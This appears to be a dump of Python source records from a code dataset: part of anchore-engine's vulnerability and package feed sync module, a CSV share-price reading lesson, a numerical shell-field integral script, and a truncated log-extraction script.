e:\n log.exception('Error syncing group: {}'.format(group_obj))\n db.rollback()\n raise\n finally:\n sync_time = time.time() - sync_time\n log.info('Syncing group took {} sec'.format(sync_time))\n\n result['updated_record_count'] = total_updated_count\n result['status'] = 'success'\n result['total_time_seconds'] = sync_time\n result['updated_image_count'] = 0\n return result\n\n def _flush_group(self, group_obj, flush_helper_fn=None):\n \"\"\"\n Flush a specific data group. Do a db flush, but not a commit at the end to keep the transaction open.\n\n :param group_obj:\n :param flush_helper_fn:\n :return:\n \"\"\"\n\n db = get_session()\n\n if flush_helper_fn:\n flush_helper_fn(db=db, feed_name=group_obj.feed_name, group_name=group_obj.name)\n\n db.query(GenericFeedDataRecord).delete()\n\n def bulk_sync(self, group=None):\n \"\"\"\n Performs a bulk sync of one or all groups, which does not do any merges or assume any data is extant to conflict.\n Will also not perform any per-record updates to the rest of the system.\n\n This is intended as a function for use on the very first sync operation when no other data is yet in the system.\n\n :param group: str name of group to sync, if None then all groups are synced\n :return: map of group:record_count for insertions\n \"\"\"\n\n self.init_feed_meta_and_groups()\n\n updated_records = {}\n\n # Each group update is a unique session and can roll itself back.\n for g in self.metadata.groups:\n log.info('Processing group for bulk sync: {}'.format(g.name))\n if not group or g.name == group:\n try:\n inserted_count = self._bulk_sync_group(g)\n updated_records[g.name] = inserted_count\n except Exception as e:\n log.exception('Failed bulk syncing group data for {}/{}'.format(self.__feed_name__, g.name))\n raise e\n else:\n log.info('Group not selected for bulk sync: {}. 
Skipping.'.format(g.name))\n\n self._update_last_sync_timestamp()\n return updated_records\n\n def _update_last_sync_timestamp(self, db=None, update_time=None):\n \"\"\"\n Update the last sync timestamp with the current time or the time provided\n :return:\n \"\"\"\n db_session = db if db else get_session()\n\n try:\n # Update timestamps\n self.metadata.last_update = update_time if update_time else datetime.datetime.utcnow()\n self.metadata.last_full_sync = self.metadata.last_update\n db_session.add(db_session.merge(self.metadata))\n\n # Only commit/rollback if no session was provided\n if not db:\n db_session.commit()\n except Exception as e:\n log.exception('Failed updating feed metadata timestamps.')\n # Don't modify session state if it was provided in call\n if not db:\n db_session.rollback()\n raise\n\n def init_feed_meta_and_groups(self):\n db = get_session()\n try:\n log.debug('Refreshing groups')\n self._sync_meta()\n self.refresh_groups()\n db.add(self.metadata)\n db.commit()\n except (InsufficientAccessTierError, InvalidCredentialsError):\n raise\n except Exception as e:\n db.rollback()\n raise\n\n def sync(self, group=None, item_processing_fn=None, full_flush=False, flush_helper_fn=None):\n \"\"\"\n Sync data with the feed source. This may be *very* slow if there are lots of updates.\n\n Returns a dict with the following structure:\n {\n 'group_name': [ record1, record2, ..., recordN],\n 'group_name2': [ record1, record2, ...., recordM],\n ...\n }\n\n :param: group: The group to sync, optionally. If not specified, all groups are synced.\n :return: changed data updated in the sync as a list of records \n \"\"\"\n\n self.init_feed_meta_and_groups()\n\n result = build_feed_sync_results()\n result['status'] = 'failure'\n result['feed'] = self.__feed_name__\n\n failed_count = 0\n\n # Each group update is a unique session and can roll itself back.\n t = time.time()\n for g in self.metadata.groups:\n log.info('Processing group: {}'.format(g.name))\n if not group or g.name == group:\n if full_flush:\n log.info('Performing group data flush prior to sync')\n self._flush_group(g, flush_helper_fn)\n\n try:\n new_data = self._sync_group(g, full_flush=full_flush) # Each group sync is a transaction\n result['groups'].append(new_data)\n except Exception as e:\n log.exception('Failed syncing group data for {}/{}'.format(self.__feed_name__, g.name))\n failed_count += 1\n else:\n log.info('Skipping group {} since not selected'.format(g))\n\n sync_time = time.time() - t\n db = get_session()\n try:\n # Update timestamps\n self.metadata.last_update = datetime.datetime.utcnow()\n self.metadata.last_full_sync = self.metadata.last_update\n db.add(db.merge(self.metadata))\n db.commit()\n except Exception as e:\n log.exception('Failed updating feed metadata timestamps.')\n db.rollback()\n raise\n\n result['total_time_seconds'] = sync_time\n result['status'] = 'success' if failed_count == 0 else 'failure'\n return result\n\n def group_by_name(self, group_name):\n return [x for x in self.metadata.groups if x.name == group_name] if self.metadata else []\n\n def refresh_groups(self):\n group_list = self.source.list_feed_groups(self.__feed_name__)\n\n for group in group_list:\n my_group = self.group_by_name(group.name)\n if not my_group:\n g = FeedGroupMetadata(name=group.name, description=group.description, access_tier=group.access_tier, feed=self.metadata)\n g.last_sync = None\n\n\nclass VulnerabilityFeed(AnchoreServiceFeed):\n \"\"\"\n Vulnerabilities feed from anchore feed service backend. 
Unique in that the records are nested and have structure.\n Each vulnerability record maps to a set of records in the DB: one for the vulnerability and a set for each of the FixedIn and\n VulnerableIn collections that are optionally present for the vulnerability main record.\n\n \"\"\"\n\n __feed_name__ = 'vulnerabilities'\n _cve_key = 'Name'\n __group_data_mappers__ = SingleTypeMapperFactory(__feed_name__, VulnerabilityFeedDataMapper, _cve_key)\n\n def query_by_key(self, key, group=None):\n if not group:\n raise ValueError('Group must be specified since it is part of the key for vulnerabilities')\n\n db = get_session()\n try:\n return db.query(Vulnerability).get((key, group))\n except Exception as e:\n log.exception('Could not retrieve vulnerability by key:')\n\n def query_data_since(self, since_datetime, group=None):\n db = get_session()\n try:\n if not group:\n return db.query(Vulnerability).filter(Vulnerability.updated_at >= since_datetime).all()\n else:\n return db.query(Vulnerability).filter(Vulnerability.updated_at >= since_datetime, Vulnerability.namespace_name == group).all()\n except Exception as e:\n log.exception('Could not retrieve vulnerability by key:')\n\n def _dedup_data_key(self, item):\n return item.id\n\n def _sync_group(self, group_obj, vulnerability_processing_fn=None, full_flush=False):\n \"\"\"\n Sync data from a single group and return the data. The vulnerability_processing_fn callback is invoked for each item within the transaction scope.\n\n :param group_obj: the group object to sync\n :param bulk_load: should the load be done in bulk fashion, typically this is only for first run as it bypasses all per-item processing\n :return:\n \"\"\"\n sync_time = time.time()\n result = build_group_sync_result()\n result['status'] = 'failure'\n result['group'] = group_obj.name\n\n db = get_session()\n\n if full_flush:\n last_sync = None\n else:\n last_sync = group_obj.last_sync\n\n total_updated_count = 0\n updated_images = set()\n try:\n next_token = ''\n while next_token is not None:\n if next_token == '':\n next_token = None\n fetch_time = time.time()\n new_data_deduped, next_token = self._get_deduped_data(group_obj, since=last_sync, next_token=next_token, max_pages=self.MAX_FEED_SYNC_PAGES)\n fetch_time = time.time() - fetch_time\n log.debug('Group data fetch took {} sec'.format(fetch_time))\n log.debug('Merging {} records from group {}'.format(len(new_data_deduped), group_obj.name))\n total_updated_count += len(new_data_deduped)\n\n db_time = time.time()\n for rec in new_data_deduped:\n # Make any updates and changes within this single transaction scope\n updated_image_ids = self.update_vulnerability(db, rec, vulnerability_processing_fn=vulnerability_processing_fn)\n updated_images = updated_images.union(set(updated_image_ids)) # Record after commit to ensure in-sync.\n db.flush()\n log.debug('Db merge took {} sec'.format(time.time() - db_time))\n\n group_obj.last_sync = datetime.datetime.utcnow()\n db.add(group_obj)\n db.commit()\n except Exception as e:\n log.exception('Error syncing group: {}'.format(group_obj))\n db.rollback()\n raise\n finally:\n sync_time = time.time() - sync_time\n log.info('Syncing group took {} sec'.format(sync_time))\n\n result['total_time_seconds'] = sync_time\n result['status'] = 'success'\n result['updated_image_count'] = len(list(updated_images))\n result['updated_record_count'] = total_updated_count\n return result\n\n @staticmethod\n def _are_match_equivalent(vulnerability_a, vulnerability_b):\n \"\"\"\n Returns true if the two records 
(including child fixedin and/or vulnerablein records) are equivalent in terms of package matching.\n\n TODO: move this logic to a vuln-scan abstraction, but that abstraction needs more work before it's ready. Would like to keep the definition of what impacts matches centralized so as not to get out-of-sync.\n\n :param vulnerability_a:\n :param vulnerability_b:\n :return:\n \"\"\"\n\n if not (vulnerability_a and vulnerability_b) or vulnerability_a.id != vulnerability_b.id or vulnerability_a.namespace_name != vulnerability_b.namespace_name:\n # They aren't the same item reference\n log.debug('Vuln id or namespaces are different: {} {} {} {}'.format(vulnerability_a.id, vulnerability_b.id, vulnerability_a.namespace_name, vulnerability_b.namespace_name))\n return False\n\n normalized_fixes_a = {(fix.name, fix.epochless_version, fix.version) for fix in vulnerability_a.fixed_in}\n normalized_fixes_b = {(fix.name, fix.epochless_version, fix.version) for fix in vulnerability_b.fixed_in}\n\n fix_diff = normalized_fixes_a.symmetric_difference(normalized_fixes_b)\n if fix_diff:\n log.debug('Fixed In records diff: {}'.format(fix_diff))\n return False\n\n #normalized_vulnin_a = {(vuln.name, vuln.epochless_version, vuln.version) for vuln in vulnerability_a.vulnerable_in}\n #normalized_vulnin_b = {(vuln.name, vuln.epochless_version, vuln.version) for vuln in vulnerability_b.vulnerable_in}\n\n #vulnin_diff = normalized_vulnin_a.symmetric_difference(normalized_vulnin_b)\n\n #if vulnin_diff:\n # log.debug('VulnIn records diff: {}'.format(vulnin_diff))\n # return False\n\n return True\n\n def update_vulnerability(self, db, vulnerability_record, vulnerability_processing_fn=None):\n \"\"\"\n Processes a single vulnerability record. Specifically for vulnerabilities:\n Checks and updates any fixed-in or vulnerable-in records and, given the final state of the vulnerability,\n calls the callback function, which is expected to do things like update image vulnerability lists based\n on the new item.\n\n :param vulnerability_record: the record from the feed source to process and load into the db.\n :param vulnerability_processing_fn: a callback function to execute with the new data, but before any transaction commit\n :return:\n \"\"\"\n try:\n updates = []\n\n try:\n existing = db.query(Vulnerability).filter(Vulnerability.id == vulnerability_record.id, Vulnerability.namespace_name == vulnerability_record.namespace_name).one_or_none()\n except:\n log.debug('No current record found for {}'.format(vulnerability_record))\n existing = None\n\n if existing:\n needs_update = not VulnerabilityFeed._are_match_equivalent(existing, vulnerability_record)\n if needs_update:\n log.debug('Found update that requires an image match update from {} to {}'.format(existing, vulnerability_record))\n else:\n needs_update = True\n\n merged = db.merge(vulnerability_record)\n\n if vulnerability_processing_fn and needs_update:\n updates = vulnerability_processing_fn(db, merged)\n else:\n log.debug('Skipping image processing due to no diff: {}'.format(merged))\n\n return updates\n except Exception as e:\n log.exception('Error in vulnerability processing')\n raise e\n\n def _flush_group(self, group_obj, flush_helper_fn=None):\n db = get_session()\n # Guard like the base class does; callers may pass flush_helper_fn=None\n if flush_helper_fn:\n flush_helper_fn(db=db, feed_name=group_obj.feed_name, group_name=group_obj.name)\n\n count = db.query(FixedArtifact).filter(FixedArtifact.namespace_name == group_obj.name).delete()\n log.info('Flushed {} fix records'.format(count))\n #count = 
db.query(VulnerableArtifact).filter(VulnerableArtifact.namespace_name == group_obj.name).delete()\n #log.info('Flushed {} vuln_in records'.format(count))\n count = db.query(Vulnerability).filter(Vulnerability.namespace_name == group_obj.name).delete()\n log.info('Flushed {} vulnerability records'.format(count))\n\n db.flush()\n\n def sync(self, group=None, item_processing_fn=None, full_flush=False, flush_helper_fn=None):\n \"\"\"\n Sync data with the feed source. This may be *very* slow if there are lots of updates.\n\n Returns a dict with the following structure:\n {\n 'group_name': [ record1, record2, ..., recordN],\n 'group_name2': [ record1, record2, ...., recordM],\n ...\n }\n\n :param: group: The group to sync, optionally. If not specified, all groups are synced.\n :return: changed data updated in the sync as a list of records\n \"\"\"\n\n self.init_feed_meta_and_groups()\n\n result = {\n 'feed': self.__feed_name__,\n 'status': 'sync_failed',\n 'total_time_seconds': -1,\n 'groups': []\n }\n\n groups_failed = 0\n\n # Setup the group name cache\n feed_list_cache.vuln_group_list = [x.name for x in self.metadata.groups]\n try:\n # Each group update is a unique session and can roll itself back.\n for g in self.metadata.groups:\n log.info('Processing group: {}'.format(g.name))\n if not group or g.name == group:\n if full_flush:\n log.info('Performing group data flush prior to sync')\n self._flush_group(g, flush_helper_fn)\n\n try:\n new_data = self._sync_group(g, vulnerability_processing_fn=item_processing_fn, full_flush=full_flush)\n #updated_records[g.name] = new_data\n result['groups'].append(new_data)\n except Exception as e:\n log.exception('Failed syncing group data for {}/{}'.format(self.__feed_name__, g.name))\n groups_failed += 1\n else:\n log.info('Group not selected for sync: {}. 
Skipping.'.format(g.name))\n\n self._update_last_sync_timestamp()\n if groups_failed > 0:\n result['status'] = 'failure'\n else:\n result['status'] = 'success'\n return result\n\n finally:\n feed_list_cache.vuln_group_list = None\n\n\n @staticmethod\n def cached_group_name_lookup(name):\n return name in feed_list_cache.vuln_group_list if feed_list_cache and hasattr(feed_list_cache, 'vuln_group_list') else False\n\n def record_count(self, group_name):\n db = get_session()\n try:\n return db.query(Vulnerability).filter(Vulnerability.namespace_name == group_name).count()\n except Exception as e:\n log.exception('Error getting feed data group record count in package feed for group: {}'.format(group_name))\n raise\n finally:\n db.rollback()\n\n\nclass PackagesFeed(AnchoreServiceFeed):\n \"\"\"\n Feed for package data, served from the anchore feed service backend\n \"\"\"\n\n __feed_name__ = 'packages'\n\n __group_data_mappers__ = {\n 'gem': GemPackageDataMapper,\n 'npm': NpmPackageDataMapper\n }\n\n def query_by_key(self, key, group=None):\n if not group:\n raise ValueError('Group must be specified since it is part of the key for vulnerabilities')\n\n db = get_session()\n if group == 'gem':\n try:\n return db.query(GemMetadata).get(key)\n except Exception as e:\n log.exception('Could not retrieve vulnerability by key:')\n raise\n elif group == 'npm':\n try:\n return db.query(NpmMetadata).get(key)\n except Exception as e:\n log.exception('Could not retrieve vulnerability by key:')\n raise\n else:\n return None\n\n def _dedup_data_key(self, item):\n return item.name\n\n def record_count(self, group_name):\n db = get_session()\n try:\n if group_name == 'npm':\n return db.query(NpmMetadata).count()\n elif group_name == 'gem':\n return db.query(GemMetadata).count()\n else:\n return 0\n except Exception as e:\n log.exception('Error getting feed data group record count in package feed for group: {}'.format(group_name))\n raise\n finally:\n db.rollback()\n\n def _flush_group(self, group_obj, flush_helper_fn=None):\n db = get_session()\n if flush_helper_fn:\n flush_helper_fn(db=db, feed_name=group_obj.feed_name, group_name=group_obj.name)\n\n if group_obj.name == 'npm':\n ent_cls = NpmMetadata\n elif group_obj.name == 'gem':\n ent_cls = GemMetadata\n else:\n log.info('Unknown group name {}. 
Nothing to flush'.format(group_obj.name))\n return\n\n count = db.query(ent_cls).delete()\n log.info('Flushed {} {} records'.format(count, group_obj.name))\n\n db.flush()\n\n\nclass NvdFeed(AnchoreServiceFeed):\n \"\"\"\n Feed for package data, served from the anchore feed service backend\n \"\"\"\n\n __feed_name__ = 'nvd'\n _cve_key = '@id'\n __group_data_mappers__ = SingleTypeMapperFactory(__feed_name__, NvdFeedDataMapper, _cve_key)\n\n def query_by_key(self, key, group=None):\n if not group:\n raise ValueError('Group must be specified since it is part of the key for vulnerabilities')\n\n db = get_session()\n try:\n return db.query(NvdMetadata).get((key, group))\n except Exception as e:\n log.exception('Could not retrieve nvd vulnerability by key:')\n\n def _flush_group(self, group_obj, flush_helper_fn=None):\n\n db = get_session()\n if flush_helper_fn:\n flush_helper_fn(db=db, feed_name=group_obj.feed_name, group_name=group_obj.name)\n\n count = db.query(CpeVulnerability).filter(CpeVulnerability.namespace_name == group_obj.name).delete()\n log.info('Flushed {} CpeVuln records'.format(count))\n count = db.query(NvdMetadata).filter(NvdMetadata.namespace_name == group_obj.name).delete()\n log.info('Flushed {} Nvd records'.format(count))\n\n db.flush()\n\n def _dedup_data_key(self, item):\n return item.name\n\n def record_count(self, group_name):\n db = get_session()\n try:\n if 'nvddb' in group_name:\n return db.query(NvdMetadata).filter(NvdMetadata.namespace_name == group_name).count()\n else:\n return 0\n except Exception as e:\n log.exception('Error getting feed data group record count in package feed for group: {}'.format(group_name))\n raise\n finally:\n db.rollback()\n\n\nclass SnykFeed(VulnerabilityFeed):\n \"\"\"\n Feed for package data, served from the anchore feed service backend\n \"\"\"\n\n __feed_name__ = 'snyk'\n _cve_key = 'id'\n __group_data_mappers__ = SingleTypeMapperFactory(__feed_name__, SnykFeedDataMapper, _cve_key)\n\n# def query_by_key(self, key, group=None):\n# if not group:\n# raise ValueError('Group must be specified since it is part of the key for vulnerabilities')\n# db = get_session()\n# try:\n# return db.query(Vulnerability).get((key, group))\n# except Exception as e:\n# log.exception('Could not retrieve snyk vulnerability by key:')\n\n# def _dedup_data_key(self, item):\n# return item.id\n\n def record_count(self, group_name):\n db = get_session()\n try:\n if 'snyk' in group_name:\n return db.query(Vulnerability).filter(Vulnerability.namespace_name == group_name).count()\n else:\n return 0\n except Exception as e:\n log.exception('Error getting feed data group record count in package feed for group: {}'.format(group_name))\n raise\n finally:\n db.rollback()\n\n\nclass FeedFactory(object):\n \"\"\"\n Factory class for creating feed objects. 
Not strictly necessary yet: there are no dynamically discovered feeds, so the set of feeds\n is known in advance and the group types do not change unexpectedly.\n\n \"\"\"\n override_mapping = {\n 'vulnerabilities': VulnerabilityFeed,\n 'packages': PackagesFeed,\n 'nvd': NvdFeed,\n 'snyk': SnykFeed,\n }\n\n default_mapping = AnchoreServiceFeed\n\n @classmethod\n def create(cls, feed_msg, src):\n \"\"\"\n Creates a new feed record and object from the received message\n :param feed_msg: the feed descriptor received from the feed service\n :param src: the feed source object to back the new feed\n :return: DataFeed object\n \"\"\"\n record = FeedMetadata(name=feed_msg.name, description=feed_msg.description, access_tier=feed_msg.access_tier)\n obj = cls.get(record.name, record, src)\n return obj\n\n @classmethod\n def get(cls, name, record, src):\n \"\"\"\n Returns a feed instance for the given feed name based on mappings. If a specific mapping is found,\n it is used, else the generic feed object is used.\n\n :param name: name of the feed, should be unique across sources\n :return:\n \"\"\"\n try:\n clazz = cls.override_mapping.get(name)\n if clazz:\n return clazz(record, src=src)\n else:\n return cls.default_mapping(record, src=src)\n\n except KeyError:\n # Fall back to the generic feed; the original code assigned without\n # returning here, which would have yielded None on this path\n return AnchoreServiceFeed(record, src=src)\n\n\nclass DataFeeds(object):\n _proxy = None\n _vulnerabilitiesFeed_cls = VulnerabilityFeed\n _packagesFeed_cls = PackagesFeed\n _nvdsFeed_cls = NvdFeed\n _snyksFeed_cls = SnykFeed\n\n def __init__(self):\n self.vuln_fn = None\n self.vuln_flush_fn = None\n\n @classmethod\n def instance(cls):\n if not cls._proxy:\n cls._proxy = DataFeeds()\n return cls._proxy\n\n def list_metadata(self):\n \"\"\"\n Returns a list of FeedMetadata objects populated with FeedGroupMetadata objects as returned by the db, but detached from the session.\n\n :return: list of FeedMetadata objects\n \"\"\"\n db = get_session()\n try:\n feeds = db.query(FeedMetadata).all()\n response = []\n for f in feeds:\n t = f.to_detached()\n t.groups = [g.to_detached() for g in f.groups]\n response.append(t)\n\n return response\n except Exception as e:\n log.exception('Could not get feed metadata')\n raise e\n finally:\n db.rollback()\n\n def records_for(self, feed_name, group_name):\n if feed_name == 'vulnerabilities':\n return self.vulnerabilities.record_count(group_name)\n elif feed_name == 'packages':\n return self.packages.record_count(group_name)\n elif feed_name == 'nvd':\n return self.nvd.record_count(group_name)\n elif feed_name == 'snyk':\n return self.snyk.record_count(group_name)\n else:\n return 0\n\n def refresh(self):\n \"\"\"\n Refresh listing of feeds. 
This is basically a no-op for now until we have dynamic feed schema detection since by\n design we only want to sync feeds we know about and have a data format for and those are enumerated.\n\n This function does verify that the expected feeds are available for a sync.\n :return: True on success, raise exception on failure to find a feed\n \"\"\"\n\n try:\n self.vulnerabilities.refresh_groups()\n except (InsufficientAccessTierError, InvalidCredentialsError) as e:\n log.error('Cannot update group metadata for vulnerabilities feed due to insufficient access or invalid credentials: {}'.format(e.message))\n\n try:\n self.packages.refresh_groups()\n except (InsufficientAccessTierError, InvalidCredentialsError) as e:\n log.error('Cannot update group metadata for packages feed due to insufficient access or invalid credentials: {}'.format(e.message))\n\n try:\n self.nvd.refresh_groups()\n except (InsufficientAccessTierError, InvalidCredentialsError) as e:\n log.error('Cannot update group metadata for Nvd feed due to insufficient access or invalid credentials: {}'.format(e.message))\n\n try:\n self.snyk.refresh_groups()\n except (InsufficientAccessTierError, InvalidCredentialsError) as e:\n log.error('Cannot update group metadata for snyk feed due to insufficient access or invalid credentials: {}'.format(e.message))\n\n def sync(self, to_sync=None, full_flush=False):\n \"\"\"\n Sync all feeds.\n :return:\n \"\"\"\n\n all_success = True\n\n result = []\n log.info('Performing feed sync of feeds: {}'.format('all' if to_sync is None else to_sync))\n\n # Initialize the feed metadata and groups first\n\n vuln_feed = None\n if to_sync is None or 'vulnerabilities' in to_sync:\n try:\n log.info('Syncing group metadata for vulnerabilities feed')\n vuln_feed = self.vulnerabilities\n vuln_feed.init_feed_meta_and_groups()\n except:\n log.exception('Cannot sync group metadata for vulnerabilities feed')\n vuln_feed = None\n\n pkgs_feed = None\n if to_sync is None or 'packages' in to_sync:\n try:\n log.info('Syncing group metadata for packages feed')\n pkgs_feed = self.packages\n pkgs_feed.init_feed_meta_and_groups()\n except:\n log.exception('Cannot sync group metadata for packages feed')\n pkgs_feed = None\n\n nvd_feed = None\n if to_sync is None or 'nvd' in to_sync:\n try:\n log.info('Syncing group metadata for nvd feed')\n nvd_feed = self.nvd\n nvd_feed.init_feed_meta_and_groups()\n except:\n log.exception('Cannot sync group metadata for nvd feed')\n nvd_feed = None\n\n snyk_feed = None\n if to_sync is None or 'snyk' in to_sync:\n try:\n log.info('Syncing group metadata for snyk feed')\n snyk_feed = self.snyk\n snyk_feed.init_feed_meta_and_groups()\n except:\n log.warn('Cannot sync group metadata for snyk feed, may not be available in the feed source')\n log.debug(traceback.format_exc())\n snyk_feed = None\n\n # Perform the feed sync next\n\n if vuln_feed:\n t = time.time()\n try:\n log.info('Syncing vulnerability feed')\n\n result.append(vuln_feed.sync(item_processing_fn=self.vuln_fn, full_flush=full_flush, flush_helper_fn=self.vuln_flush_fn))\n except:\n log.exception('Failure updating the vulnerabilities feed')\n all_success = False\n fail_result = build_feed_sync_results()\n fail_result['feed'] = vuln_feed.__feed_name__\n fail_result['total_time_seconds'] = time.time() - t\n result.append(fail_result)\n\n if pkgs_feed:\n t = time.time()\n try:\n log.info('Syncing packages feed')\n result.append(pkgs_feed.sync(full_flush=full_flush))\n except:\n log.exception('Failure updating the packages feed')\n 
all_success = False\n fail_result = build_feed_sync_results()\n fail_result['feed'] = pkgs_feed.__feed_name__\n fail_result['total_time_seconds'] = time.time() - t\n result.append(fail_result)\n\n if nvd_feed:\n t = time.time()\n try:\n log.info('Syncing nvd feed')\n result.append(nvd_feed.sync(full_flush=full_flush))\n except:\n log.exception('Failure updating the nvd feed')\n all_success = False\n fail_result = build_feed_sync_results()\n fail_result['feed'] = nvd_feed.__feed_name__\n fail_result['total_time_seconds'] = time.time() - t\n result.append(fail_result)\n\n if snyk_feed:\n t = time.time()\n try:\n log.info('Syncing snyk feed')\n result.append(snyk_feed.sync(item_processing_fn=self.vuln_fn, full_flush=full_flush, flush_helper_fn=self.vuln_flush_fn))\n except:\n log.exception('Failure updating the snyk feed')\n all_success = False\n fail_result = build_feed_sync_results()\n fail_result['feed'] = snyk_feed.__feed_name__\n fail_result['total_time_seconds'] = time.time() - t\n result.append(fail_result)\n\n if not all_success:\n raise Exception(\"one or more feeds failed to sync\")\n\n return result\n\n def bulk_sync(self, to_sync=None, only_if_unsynced=True):\n \"\"\"\n Sync all feeds using a bulk sync for each for performance, particularly on initial sync.\n :param to_sync: list of feed names to sync, if None all feeds are synced\n :return:\n \"\"\"\n\n all_success = True\n\n updated_records = {}\n\n if to_sync is None or 'vulnerabilities' in to_sync:\n if not only_if_unsynced or self.vulnerabilities.never_synced():\n log.info('Bulk syncing vulnerability feed')\n try:\n updated_records['vulnerabilities'] = self.vulnerabilities.bulk_sync()\n except Exception as err:\n log.exception('Failure updating the vulnerabilities feed. Continuing with next feed')\n all_success = False\n\n else:\n log.info('Skipping bulk sync since feed already initialized')\n\n if to_sync is None or 'packages' in to_sync:\n if not only_if_unsynced or self.packages.never_synced():\n try:\n log.info('Syncing packages feed')\n updated_records['packages'] = self.packages.bulk_sync()\n except Exception as err:\n log.exception('Failure updating the packages feed. Continuing with next feed')\n all_success = False\n\n else:\n log.info('Skipping bulk sync since feed already initialized')\n\n if to_sync is None or 'nvd' in to_sync:\n if not only_if_unsynced or self.nvd.never_synced():\n try:\n log.info('Syncing nvd feed')\n updated_records['nvd'] = self.nvd.bulk_sync()\n except Exception as err:\n log.exception('Failure updating the nvd feed. Continuing with next feed')\n all_success = False\n\n else:\n log.info('Skipping bulk sync since feed already initialized')\n\n if to_sync is None or 'snyk' in to_sync:\n if not only_if_unsynced or self.snyk.never_synced():\n try:\n log.info('Syncing snyk feed')\n updated_records['snyk'] = self.snyk.bulk_sync()\n except Exception as err:\n log.exception('Failure updating the snyk feed. 
Continuing with next feed')\n all_success = False\n\n else:\n log.info('Skipping bulk sync since feed already initialized')\n\n\n if not all_success:\n raise Exception(\"one or more feeds failed to sync\")\n\n return updated_records\n\n @property\n def vulnerabilities(self):\n return self._vulnerabilitiesFeed_cls()\n\n @property\n def packages(self):\n return self._packagesFeed_cls()\n\n @property\n def nvd(self):\n return self._nvdsFeed_cls()\n\n @property\n def snyk(self):\n return self._snyksFeed_cls()\n","sub_path":"anchore_engine/services/policy_engine/engine/feeds.py","file_name":"feeds.py","file_ext":"py","file_size_in_byte":66136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
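The sync() and bulk_sync() methods above repeat one near-identical try/log/continue block per feed. A hedged sketch of the same control flow driven by a table of (name, feed) pairs; the helper names (run_one_sync, sync_all) and the simplified failure dict are illustrative assumptions, not the project's API:

    import logging
    import time

    log = logging.getLogger(__name__)

    def run_one_sync(name, feed, **sync_kwargs):
        # Sync a single feed; on failure, log it and return a minimal failure record
        start = time.time()
        try:
            log.info('Syncing %s feed', name)
            return feed.sync(**sync_kwargs)
        except Exception:
            log.exception('Failure updating the %s feed', name)
            return {'feed': name, 'status': 'failure',
                    'total_time_seconds': time.time() - start}

    def sync_all(feeds, to_sync=None, full_flush=False):
        # feeds: mapping of feed name -> feed object exposing a sync() method
        results = [run_one_sync(name, feed, full_flush=full_flush)
                   for name, feed in feeds.items()
                   if to_sync is None or name in to_sync]
        if any(r.get('status') == 'failure' for r in results):
            raise Exception('one or more feeds failed to sync')
        return results

The per-feed keyword differences (the vulnerability and snyk feeds also take item_processing_fn and flush_helper_fn) could be carried in the table as a third per-feed kwargs entry.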
+{"seq_id":"367380575","text":"\"\"\"\nReading csv file into some data-structure and perform some calculation\n\"\"\"\nimport csv\nfrom conf.read_conf import read_config\n\n\ndef reading_csv(filename, errors=\"warn\"):\n \"\"\"\n Read csv files and store it into dict\n \"\"\"\n\n # ----checking for value error\n if errors not in {'warn', 'raise', 'silent'}:\n raise ValueError(\"erros must be one of 'warn', 'raise', 'silent'\")\n\n # ----list\n records = []\n\n # ----reading csv file\n with open(filename, \"r\") as f:\n rows = csv.reader(f)\n next(rows) # ----skip header\n for rowno, row in enumerate(rows, start=1):\n try:\n row[2] = int(row[2])\n row[3] = float(row[3])\n except Exception as err:\n if errors == \"warn\":\n print('row: ', rowno, 'bad row: ', row)\n print('row: ', rowno, 'Reason: ', err)\n elif errors == \"raise\":\n raise SystemExit(\"Error: \", err)\n else:\n pass # ----ignore\n\n # ----dict\n record = {\n \"name\": row[0],\n \"date\": row[1],\n \"share\": row[2],\n \"price\": row[3]\n }\n # ----append\n records.append(record)\n\n return records\n\n\nif __name__ == '__main__':\n\n # ----reading conf\n home = read_config()\n\n # ----csv file\n data = reading_csv(home + \"Data/profile.csv\")\n\n total = 0.0\n # ----loop through records by unpacking\n for line in data:\n total += line[\"share\"] * line[\"price\"] # ----shares * price\n\n print(\"total: \", total)\n","sub_path":"lesson_5/practical/reading_csv_with_dict.py","file_name":"reading_csv_with_dict.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"281901672","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\nnpt=np.int(1e4)\ntheta=np.linspace(0,np.pi,npt)\ndtheta=np.median(np.diff(theta))\nr=1.0\nzvec=np.linspace(0,2,100)\nf=np.zeros(len(zvec))\nfor i,z in enumerate(zvec):\n numerator=(z-r*np.cos(theta))*np.sin(theta)\n denom=(z**2+r**2-2*r*z*np.cos(theta))**1.5\n f[i]=0.5*np.sum(numerator/denom)*dtheta\n\nplt.clf()\nplt.plot(zvec,f,linewidth=4.0)\npred=0*zvec\npred[zvec>r]=zvec[zvec>r]**-2\nplt.plot(zvec,pred,'--')\nplt.legend(['Numerical Result','Prediction'])\nplt.savefig('shell_field.png')\n\n\n\n\n","sub_path":"lecture_3/shell_integral.py","file_name":"shell_integral.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"227390916","text":"import sys, getopt, os, re\ninputfile = sys.argv[1]\n\nf = open(inputfile)\nalltext = f.read()\nlines = alltext.splitlines()\n\nlogE = 0.43429448190325182765112891\ninf = 9999999999999999\n\nmarker1, marker2 = -1, -1\n\nlinenum = 0\npre_time = 0\n\nfor linenum, line in enumerate(lines):\n\tif 'Initialization complete' in line:\n\t\tpre_time = float(line.split()[-2])\n\tif 'Starting search' in line:\n\t\tmarker1 = linenum + 1\n\tif 'Search done' in line:\n\t\tmarker2 = linenum - 3\n\nif marker2 == -1:\n\tmarker2 = linenum\n\n# print(marker2, marker1)\n\nif marker1 == -1:\n\tif 'Solved during initialization' in alltext:\n\t\tfor k, t in enumerate([10, 60, 600, 3600, 10800, 21600]):\n\t\t\tfo = open('extracted/'+sys.argv[2]+'-'+sys.argv[3]+'-i'+sys.argv[4]+'-'+sys.argv[5]+'-t'+str(t)+'.ext', 'w')\n\t\t\tprint(str(inf)+' '+str(inf)+' '+str(inf)+' '+str(pre_time), file = fo)\n\t\t\tfo.close()\n\n\telse:\n\t\tfor k, t in enumerate([10, 60, 600, 3600, 10800, 21600]):\n\t\t\tfo = open('extracted/'+sys.argv[2]+'-'+sys.argv[3]+'-i'+sys.argv[4]+'-'+sys.argv[5]+'-t'+str(t)+'.ext', 'w')\n\t\t\tprint(str(inf)+' '+str(inf)+' '+str(inf)+' '+str(inf), file = 